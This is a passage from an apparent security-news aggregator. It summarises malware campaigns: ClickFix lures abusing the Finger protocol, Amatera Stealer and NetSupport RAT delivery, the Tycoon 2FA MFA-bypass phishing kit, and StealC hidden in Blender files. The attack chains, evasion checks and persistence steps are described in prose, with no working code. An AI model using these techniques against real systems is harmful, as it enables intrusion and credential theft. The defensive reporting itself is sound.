- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Payloads delivered in these attacks include the MSHTA executable, PowerShell scripts, and other living-off-the-land binaries.
First reported: 06.11.2025 16:00 · 2 sources, 10 articles
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
-
Future ClickFix attacks could run entirely in the browser, evading EDR protections.
First reported: 06.11.2025 16:00 · 2 sources, 7 articles
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Threat actors are abusing the decades-old Finger protocol to retrieve and execute remote commands on Windows devices.
First reported: 15.11.2025 20:46 · 2 sources, 7 articles
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The Finger protocol is used to deliver commands that create a random-named path, download a zip archive disguised as a PDF, and extract a Python malware package.
First reported: 15.11.2025 20:46 · 2 sources, 7 articles
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The Python program is executed with `pythonw.exe __init__.py`, and a callback is made to the attacker's server to confirm execution.
First reported: 15.11.2025 20:46 · 2 sources, 7 articles
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
A related batch file indicates that the Python package is an infostealer.
First reported: 15.11.2025 20:46 · 2 sources, 7 articles
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Another campaign uses the Finger protocol to retrieve and run commands that look for malware research tools and exit if found.
First reported: 15.11.2025 20:46 · 2 sources, 7 articles
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
If no malware analysis tools are found, the commands download a zip archive disguised as PDF files and extract the NetSupport Manager RAT package.
First reported: 15.11.2025 20:46 · 2 sources, 7 articles
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The commands configure a scheduled task to launch the remote access malware when the user logs in.
First reported: 15.11.2025 20:46 · 2 sources, 7 articles
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The Finger protocol abuse appears to be carried out by a single threat actor conducting ClickFix attacks.
First reported: 15.11.2025 20:46 · 2 sources, 7 articles
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Amatera Stealer is an evolution of ACR Stealer, available under a malware-as-a-service (MaaS) model with subscription plans ranging from $199 per month to $1,499 per year.
First reported: 17.11.2025 18:53 · 2 sources, 6 articles
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Amatera Stealer targets crypto-wallets, browsers, messaging applications, FTP clients, and email services, employing advanced evasion techniques such as WoW64 SysCalls.
First reported: 17.11.2025 18:53 · 2 sources, 6 articles
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Amatera Stealer is packed using PureCrypter, a C#-based multi-functional crypter and loader advertised as a MaaS offering by a threat actor named PureCoder.
First reported: 17.11.2025 18:53 · 2 sources, 6 articles
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Amatera Stealer is injected into the MSBuild.exe process to harvest sensitive data and contact an external server to execute a PowerShell command to fetch and run NetSupport RAT.
First reported: 17.11.2025 18:53 · 2 sources, 6 articles
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Amatera Stealer checks if the victim machine is part of a domain or has files of potential value, such as crypto wallets, before downloading NetSupport RAT.
First reported: 17.11.2025 18:53 · 2 sources, 6 articles
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Recent phishing campaigns have propagated a wide range of malware families, including XWorm, NetSupport RAT, credential stealers, and phishing kits named Cephas and Tycoon 2FA.
First reported: 17.11.2025 18:53 · 2 sources, 7 articles
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- Tycoon 2FA and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Tycoon 2FA is a phishing kit that bypasses multi-factor authentication (MFA) and authentication apps by intercepting usernames, passwords, session cookies, and MFA flows in real time.
First reported: 18.11.2025 17:01 · 2 sources, 7 articles
- Tycoon 2FA and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Tycoon 2FA has been used in over 64,000 attacks this year, primarily targeting Microsoft 365 and Gmail.
First reported: 18.11.2025 17:01 · 2 sources, 7 articles
- Tycoon 2FA and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Tycoon 2FA includes anti-detection layers such as Base64 encoding, LZ string compression, DOM vanishing, CryptoJS obfuscation, automated bot filtering, CAPTCHA challenges, and debugger checks.
First reported: 18.11.2025 17:01 · 2 sources, 7 articles
- Tycoon 2FA and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Tycoon 2FA can lead to total session takeover, allowing attackers to move laterally into SharePoint, OneDrive, email, Teams, HR systems, and finance systems.
First reported: 18.11.2025 17:01 · 2 sources, 7 articles
- Tycoon 2FA and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Legacy MFA methods like SMS codes, push notifications, and TOTP apps are vulnerable to Tycoon 2FA due to their reliance on user behavior.
First reported: 18.11.2025 17:01 · 2 sources, 7 articles
- Tycoon 2FA and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Criminal groups such as Scattered Spider, Octo Tempest, and Storm 1167 are using Tycoon 2FA daily.
First reported: 18.11.2025 17:01 · 2 sources, 7 articles
- Tycoon 2FA and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Phishing-proof MFA solutions, such as Token Ring and Token BioStick, use biometric authentication, proximity-based checks, and domain binding to prevent phishing attacks.
First reported: 18.11.2025 17:01 · 2 sources, 7 articles
- Tycoon 2FA and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Token Ring and Token BioStick solutions are inexpensive, available today, and provide a better user experience with faster authentication times.
First reported: 18.11.2025 17:01 · 2 sources, 7 articles
- Tycoon 2FA and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Tycoon 2FA is a turnkey kit that removes the need for technical skill, making it accessible to anyone with a browser.
First reported: 18.11.2025 17:01 · 2 sources, 6 articles
- The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Tycoon 2FA provides fake login pages and spins up reverse proxy servers, automating the phishing process.
First reported: 18.11.2025 17:01 · 2 sources, 7 articles
- The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Tycoon 2FA intercepts usernames, passwords, session cookies, and MFA flows in real time, allowing attackers to bypass MFA.
First reported: 18.11.2025 17:01 · 2 sources, 7 articles
- The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA — www.bleepingcomputer.com — 18.11.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
A new operation embedding StealC V2 inside Blender project files has been observed targeting victims for at least six months.
First reported: 24.11.2025 16:00 · 3 sources, 7 articles
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The attackers placed manipulated .blend files on platforms such as CGTrader, where users downloaded them as routine 3D assets.
First reported: 24.11.2025 16:00 · 3 sources, 7 articles
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
When opened with Blender’s Auto Run feature enabled, the files executed concealed Python scripts that launched a multistage infection.
First reported: 24.11.2025 16:00 · 3 sources, 7 articles
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The infection chain began with a tampered Rig_Ui.py script embedded inside the .blend file.
First reported: 24.11.2025 16:00 · 3 sources, 7 articles
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
This script fetched a loader from a remote workers.dev domain, which then downloaded a PowerShell stage and two ZIP archives containing Python-based stealers.
First reported: 24.11.2025 16:00 · 3 sources, 7 articles
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
